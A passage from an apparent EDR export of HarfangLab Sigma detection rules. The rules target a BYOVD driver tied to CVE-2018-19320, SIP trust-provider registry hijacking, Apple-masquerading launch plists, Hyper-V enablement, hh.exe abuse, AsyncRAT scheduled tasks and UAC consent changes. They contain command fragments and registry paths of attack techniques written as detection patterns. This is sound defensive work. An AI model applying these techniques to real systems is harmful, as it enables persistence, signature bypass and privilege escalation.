"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071474Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mallo-m",
"https://github.com/ASkyeye/CVE-2018-19320"
],
"name": "t1562_001_axiomdriver_created.yml",
"content": "title: AxiomDriver Created\nid: 2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb\ndescription: |\n Detects the creation of the Axiom driver.\n Axiom are tools used for malicious activities such as dumping the LSASS' process memory or loading shellcodes using different techniques to avoid being detected by security tools such as EDRs.\n Axiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\n It is recommended to investigate the execution context and drivers loaded before this one to determine if a vulnerable driver has not already been loaded beforehand to disable DSE.\nreferences:\n - https://github.com/mallo-m\n - https://github.com/ASkyeye/CVE-2018-19320\ndate: 2025/03/26\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\Drivers\\AxiomDriver.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb",
"rule_name": "AxiomDriver Created",
"rule_description": "Detects the creation of the Axiom driver.\nAxiom are tools used for malicious activities such as dumping the LSASS' process memory or loading shellcodes using different techniques to avoid being detected by security tools such as EDRs.\nAxiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\nIt is recommended to investigate the execution context and drivers loaded before this one to determine if a vulnerable driver has not already been loaded beforehand to disable DSE.\n",
"rule_creation_date": "2025-03-26",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a653231-c597-40e1-b664-2415c9a4a2e4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296105Z",
"creation_date": "2026-03-23T11:45:35.296108Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296115Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
"https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode",
"https://attack.mitre.org/techniques/T1553/003/"
],
"name": "t1553_003_sip_trust_provider_hijacking.yml",
"content": "title: SIP or Trust Provider Hijacked via Registry Modification\nid: 2a653231-c597-40e1-b664-2415c9a4a2e4\ndescription: |\n Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\n SIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\n Investigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\nreferences:\n - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\n - https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode\n - https://attack.mitre.org/techniques/T1553/003/\ndate: 2026/01/29\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.003\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_dll:\n EventType: SetValue\n TargetObject:\n # SIP Signature retrieval DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n # Hash validation DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n\n selection_funcname:\n EventType: SetValue\n TargetObject:\n # SIP signature retrieval function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n # Hash validation function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n\n selection_filetype:\n TargetObject|contains:\n - '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}' # PEs\n - '{603BCC1F-4B59-4E08-B724-D2C6297EF351}' # PowerShell\n - '{DE351A43-8E59-11D0-8C47-00C04FC295EE}' # Catalog\n - '{000C10F1-0000-0000-C000-000000000046}' # MSI\n - '{C689AABA-8E78-11D0-8C47-00C04FC295EE}' # Cabinet\n\n filter_legitimate_dll:\n Details:\n - 'mso.dll'\n - 'WINTRUST.DLL'\n - 'MSISIP.DLL'\n - '?:\\Program Files\\ReasonLabs\\EPP\\x64\\rsSIPProvider.dll'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\SysWOW64\\AppxSip.dll'\n - '?:\\Windows\\System32\\AppxSip.dll'\n - '?:\\Windows\\SysWOW64\\wshext.dll'\n - '?:\\Windows\\System32\\wshext.dll'\n - '?:\\Windows\\SysWOW64\\MSISIP.DLL'\n - '?:\\Windows\\System32\\MSISIP.DLL'\n - '?:\\Windows\\SysWOW64\\pwrshsip.dll'\n - '?:\\Windows\\System32\\pwrshsip.dll'\n\n filter_legitimate_funcname:\n Details:\n # Verify Indirect Data\n - 'MsoVBADigSigVerifyIndirectData'\n - 'CryptSIPVerifyIndirectData'\n - 'SIPVerifyIndirectData'\n - 'PsVerifyHash'\n - 'MsiSIPVerifyIndirectData'\n\n # Get Signed Data\n - 'MsoVBADigSigGetSignedDataMsg'\n - 'CryptSIPGetSignedDataMsg'\n - 'SIPGetSignedDataMsg'\n - 'PsGetSignature'\n - 'MsiSIPGetSignedDataMsg'\n\n condition: (\n (selection_dll and not filter_legitimate_dll) or\n (selection_funcname and not filter_legitimate_funcname)\n )\n and selection_filetype # and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a653231-c597-40e1-b664-2415c9a4a2e4",
"rule_name": "SIP or Trust Provider Hijacked via Registry Modification",
"rule_description": "Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\nSIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\nInvestigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\n",
"rule_creation_date": "2026-01-29",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1553.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616863Z",
"creation_date": "2026-03-23T11:45:34.616866Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616891Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/",
"https://attack.mitre.org/techniques/T1036/004/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1030_004_susp_plist_masquerading_apple.yml",
"content": "title: Suspicious Plist Masquerading Apple Name\nid: 2a93d0e0-f93d-4c54-a111-ce4c67fdc506\ndescription: |\n Detects the creation of a launch daemon or agent impersonating Apple.\n Adversaries may install persistence impersonating Apple in order to bypass simple security controls.\n It is recommended to check the content of the newly created persistence.\nreferences:\n - https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|contains: # create\n - '/Library/LaunchDaemons/'\n - '/Library/LaunchAgents/'\n - TargetPath|contains: # rename\n - '/Library/LaunchAgents/'\n - '/Library/LaunchDaemons/'\n selection_kind:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_name:\n - Path|endswith: 'com.apple.*'\n - TargetPath|endswith: 'com.apple.*'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506",
"rule_name": "Suspicious Plist Masquerading Apple Name",
"rule_description": "Detects the creation of a launch daemon or agent impersonating Apple.\nAdversaries may install persistence impersonating Apple in order to bypass simple security controls.\nIt is recommended to check the content of the newly created persistence.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2aa99981-34d6-4623-8d69-576d9828ba9c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626100Z",
"creation_date": "2026-03-23T11:45:34.626102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_enable_hyperv.yml",
"content": "title: Windows Hyper-V Enabled\nid: 2aa99981-34d6-4623-8d69-576d9828ba9c\ndescription: |\n Detects the activation of Windows Hyper-V virtualization feature.\n This command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\n Attackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistent.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2025/11/12\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Dism.exe'\n - OriginalFileName: 'DISM.EXE'\n\n selection_command:\n CommandLine|contains|all:\n - ' ?online'\n - ' ?enable-feature'\n - ' ?all'\n - ' ?featurename:microsoft-hyper-v'\n - ' ?norestart'\n\n exclusion_docker:\n ParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\chocolatey\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2aa99981-34d6-4623-8d69-576d9828ba9c",
"rule_name": "Windows Hyper-V Enabled",
"rule_description": "Detects the activation of Windows Hyper-V virtualization feature.\nThis command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\nAttackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistent.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n",
"rule_creation_date": "2025-11-12",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2aaef300-223b-4962-a97a-3b22e67f8221",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085739Z",
"creation_date": "2026-03-23T11:45:34.085741Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085746Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Hh/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1218_hh.yml",
"content": "title: Hh.exe Execution\nid: 2aaef300-223b-4962-a97a-3b22e67f8221\ndescription: |\n Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\n This binary can be abused by attackers to download remote files or execute binaries.\n It is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Hh/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/07/12\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\hh.exe'\n - OriginalFileName: 'HH.exe'\n filter_chm:\n CommandLine|endswith:\n - '.chm'\n - '.chm\"'\n\n exclusion_ibm:\n ParentImage:\n - '?:\\Program Files (x86)\\IBM\\Personal Communications\\pcsws.exe'\n - '?:\\Program Files\\Personal Communications\\pcsws.exe'\n\n exclusion_autohotkey:\n ParentImage|endswith: '\\AutoHotkey.exe'\n # C:\\Windows\\hh.exe ms-its:C:\\Program Files\\AutoHotkey\\AutoHotkey.chm::/docs/Welcome.htm\n CommandLine|contains: 'ms-its:*AutoHotkey.chm::/docs/'\n\n exclusion_lenovo:\n CommandLine|contains: '?:\\Program Files (x86)\\Lenovo\\Update Retriever\\'\n\n exclusion_fiduexpert:\n Image|endswith: '\\RF Logiciels\\Fidu-Expert*\\hh.exe'\n ParentImage|endswith: '\\RF Logiciels\\Fidu-Expert*\\FiduExpert.exe'\n\n exclusion_eic:\n # https://www.eic.fr/\n Image: '?:\\EIC\\DR\\Application *\\hh.exe'\n ParentImage: '?:\\EIC\\DR\\Application *\\dr.exe'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2aaef300-223b-4962-a97a-3b22e67f8221",
"rule_name": "Hh.exe Execution",
"rule_description": "Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\nThis binary can be abused by attackers to download remote files or execute binaries.\nIt is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\n",
"rule_creation_date": "2021-07-12",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622939Z",
"creation_date": "2026-03-23T11:45:34.622941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622945Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html",
"https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/",
"https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
"https://attack.mitre.org/techniques/T1053/005/",
"https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"
],
"name": "t1053_005_asyncrat_scheduled_task.yml",
"content": "title: AsyncRAT Scheduled Task Created\nid: 2acfef72-9bfe-4583-9f0a-0fdbec088a28\ndescription: |\n Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\n Attackers often used scheduled task to persistently execute malicious code.\n It is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\nreferences:\n - https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/\n - https://attack.mitre.org/techniques/T1053/005/\n - https://lolbas-project.github.io/lolbas/Binaries/Schtasks/\ndate: 2022/08/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Schtasks\n - classification.Windows.HackTool.AsyncRAT\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_cmd1:\n CommandLine|contains:\n - '/create '\n - '-create '\n - ' create '\n selection_cmd2:\n CommandLine|contains:\n - '/tn '\n - '-tn '\n\n selection_specific_asyncrat_1:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Roaming\\'\n\n selection_specific_asyncrat_2:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Local\\Temp\\'\n\n selection_specific_public_directory_1:\n CommandLine|contains|all:\n - '/sc minute /mo'\n - '\\Users\\Public\\'\n\n selection_specific_public_directory_2:\n CommandLine|contains|all:\n - '/Create /XML'\n - '\\Users\\Public\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_psappdeploytoolkit:\n # C:\\WINDOWS\\System32\\schtasks.exe /create /f /tn DeltaManager_2.0.0.2_1.0_2.0.0.2_FR_BlockedApps /xml C:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml\n CommandLine:\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\PSAppDeployToolkit-ExecuteAsUser.xml*'\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml*'\n\n exclusion_wapt:\n ParentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n condition: selection_bin and all of selection_cmd* and 1 of selection_specific_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28",
"rule_name": "AsyncRAT Scheduled Task Created",
"rule_description": "Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\nAttackers often used scheduled task to persistently execute malicious code.\nIt is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b08e300-2cbf-4b7f-8b71-d33804657613",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622461Z",
"creation_date": "2026-03-23T11:45:34.622463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622467Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration",
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_uac_consent_config_change.yml",
"content": "title: UAC Registry Configuration Modified\nid: 2b08e300-2cbf-4b7f-8b71-d33804657613\ndescription: |\n Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate this action to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://attack.mitre.org/techniques/T1548/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_disable:\n Details:\n - 'DWORD (0x00000000)' # This is handled by the rule 189eeb83-5aec-4186-97ea-ad22929a4f15\n - 'DWORD (0x00000005)' # This is the default value\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n 